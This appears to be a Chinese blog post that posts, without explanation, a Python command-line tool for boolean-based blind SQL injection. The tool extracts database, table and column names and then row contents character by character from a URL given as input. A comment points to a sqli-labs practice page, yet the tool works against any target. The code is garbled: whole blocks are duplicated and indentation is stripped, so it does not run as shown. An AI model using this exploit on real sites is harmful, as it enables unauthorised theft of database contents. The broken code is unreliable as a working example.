代码展示墙:
先将代码保存在这里,解析以后会补上
# -*- coding: utf-8 -*-
import requests
import sys
import hashlib
from optparse import OptionParser
parser=OptionParser()
import requests
import sys
import hashlib
from optparse import OptionParser
parser=OptionParser()
parser.add_option("-D", "--Database", action="store",type="string",dest="database",help="Please input test databases")
parser.add_option("-T", "--Table",action="store",type="string",dest="table",help="Please input test table")
parser.add_option("-C", "--Column",action="store",type="string",dest="column",help="Please input test column")
parser.add_option("-U","--Url", action="store",type="string",dest="url",help="Please input test url")
parser.add_option("-T", "--Table",action="store",type="string",dest="table",help="Please input test table")
parser.add_option("-C", "--Column",action="store",type="string",dest="column",help="Please input test column")
parser.add_option("-U","--Url", action="store",type="string",dest="url",help="Please input test url")
(options,args) = parser.parse_args()
def md5(str):
hl = hashlib.md5()
hl.update(str)
return hl.hexdigest()
hl = hashlib.md5()
hl.update(str)
return hl.hexdigest()
def http_get(url):
a=requests.get(url)
return a.content
a=requests.get(url)
return a.content
def getAllDatabases(url):
db_nums_payload = "select count(schema_name) from information_schema.schemata"
db_numbers=main(url,db_nums_payload)
db_name=""
for i in range(db_numbers):
db_len_payload="select length(schema_name) from information_schema.schemata limit %d,1" % i
db_name_numbers=main(url,db_len_payload)
for x in range(1,db_name_numbers+1):
db_lenc_payload="select ascii(substr((select schema_name from information_schema.schemata limit %d,1),%d,1))" % (i,x)
db_name+=chr(main(url,db_lenc_payload))
print("第%d个数据库的名称为:%s" % (i+1,db_name))
db_name=""
db_nums_payload = "select count(schema_name) from information_schema.schemata"
db_numbers=main(url,db_nums_payload)
db_name=""
for i in range(db_numbers):
db_len_payload="select length(schema_name) from information_schema.schemata limit %d,1" % i
db_name_numbers=main(url,db_len_payload)
for x in range(1,db_name_numbers+1):
db_lenc_payload="select ascii(substr((select schema_name from information_schema.schemata limit %d,1),%d,1))" % (i,x)
db_name+=chr(main(url,db_lenc_payload))
print("第%d个数据库的名称为:%s" % (i+1,db_name))
db_name=""
def main(url,payload):
low=0
high=126
a = md5(http_get(url))
while low <= high:
mid=(low+high)/2
# select count(schema_name) from information_schema.schemata;
cc=url + "' and (%s) > %d --+" % (payload,mid)
b=md5(http_get(cc))
if a==b:
low=mid+1
else:
q=mid-1
c=md5(http_get(url+"' and (%s) > %d --+" % (payload,q)))
if c==a:
return int(mid)
break
else:
high=mid-1
#getAllDatabases('http://192.168.3.104/sqli-labs/Less-8/?id=1')
def select():
if options.url == None and options.database == None and options.table == None and options.column == None:
print("Please read the help")
parser.print_help()
sys.exit()
elif options.url != None and options.database ==None and options.table == None and options.column == None:
getAllDatabases(options.url)
elif options.url != None and options.database !=None and options.table == None and options.column == None:
getAllTables(options.url,options.database)
elif options.url != None and options.database !=None and options.table != None and options.column == None:
getAllColumnsByTable(options.url,options.table,options.database)
elif options.url != None and options.database !=None and options.table != None and options.column != None:
getAllContent(options.url,options.column,options.table,options.database)
if options.url == None and options.database == None and options.table == None and options.column == None:
print("Please read the help")
parser.print_help()
sys.exit()
elif options.url != None and options.database ==None and options.table == None and options.column == None:
getAllDatabases(options.url)
elif options.url != None and options.database !=None and options.table == None and options.column == None:
getAllTables(options.url,options.database)
elif options.url != None and options.database !=None and options.table != None and options.column == None:
getAllColumnsByTable(options.url,options.table,options.database)
elif options.url != None and options.database !=None and options.table != None and options.column != None:
getAllContent(options.url,options.column,options.table,options.database)
def getAllTables(url,database):
tb_nums_payload = "select count(table_name) from information_schema.tables where table_schema='"+database+"'"
tb_numbers=main(url,tb_nums_payload)
tb_name=""
for i in range(tb_numbers):
tb_len_payload="select length(table_name) from information_schema.tables limit %d,1" % i
tb_name_numbers=main(url,tb_len_payload)
for x in range(1,tb_name_numbers+1):
tb_lenc_payload="select ascii(substr((select table_name from information_schema.tables where table_schema='%s' limit %d,1),%d,1))" % (database,i,x)
tb_name+=chr(main(url,tb_lenc_payload))
print("第%d个表的名称为:%s" % (i+1,tb_name))
tb_name=""
def getAllColumnsByTable(url,table,database):
cl_nums_payload = "select count(column_name) from information_schema.columns where table_name='"+table+"'"
cl_numbers=main(url,cl_nums_payload)
cl_name=""
for i in range(cl_numbers):
cl_len_payload="select length(column_name) from information_schema.columns where table_name='%s' limit %d,1" % (table,i)
cl_name_numbers=main(url,cl_len_payload)
for x in range(1,cl_name_numbers+1):
cl_lenc_payload="select ascii(substr((select column_name from information_schema.columns where table_name='%s' limit %d,1),%d,1))" % (table,i,x)
cl_name+=chr(main(url,cl_lenc_payload))
print("第%d个列的名称为:%s" % (i+1,cl_name))
cl_name=""
cl_nums_payload = "select count(column_name) from information_schema.columns where table_name='"+table+"'"
cl_numbers=main(url,cl_nums_payload)
cl_name=""
for i in range(cl_numbers):
cl_len_payload="select length(column_name) from information_schema.columns where table_name='%s' limit %d,1" % (table,i)
cl_name_numbers=main(url,cl_len_payload)
for x in range(1,cl_name_numbers+1):
cl_lenc_payload="select ascii(substr((select column_name from information_schema.columns where table_name='%s' limit %d,1),%d,1))" % (table,i,x)
cl_name+=chr(main(url,cl_lenc_payload))
print("第%d个列的名称为:%s" % (i+1,cl_name))
cl_name=""
def getAllContent(url,column,table,database):
ct_nums_payload = "select count(%s) from %s.%s" % (column,database,table)
ct_numbers=main(url,ct_nums_payload)
ct_name=""
for i in range(ct_numbers):
ct_len_payload="select length(%s) from %s.%s limit %d,1" % (column,database,table,i)
ct_name_numbers=main(url,ct_len_payload)
for x in range(1,ct_name_numbers+1):
ct_lenc_payload="select ascii(substr((select %s from %s.%s limit %d,1),%d,1))" % (column,database,table,i,x)
ct_name+=chr(main(url,ct_lenc_payload))
print("第%d个字段的内容为:%s" % (i+1,ct_name))
ct_name=""
ct_nums_payload = "select count(%s) from %s.%s" % (column,database,table)
ct_numbers=main(url,ct_nums_payload)
ct_name=""
for i in range(ct_numbers):
ct_len_payload="select length(%s) from %s.%s limit %d,1" % (column,database,table,i)
ct_name_numbers=main(url,ct_len_payload)
for x in range(1,ct_name_numbers+1):
ct_lenc_payload="select ascii(substr((select %s from %s.%s limit %d,1),%d,1))" % (column,database,table,i,x)
ct_name+=chr(main(url,ct_lenc_payload))
print("第%d个字段的内容为:%s" % (i+1,ct_name))
ct_name=""
select()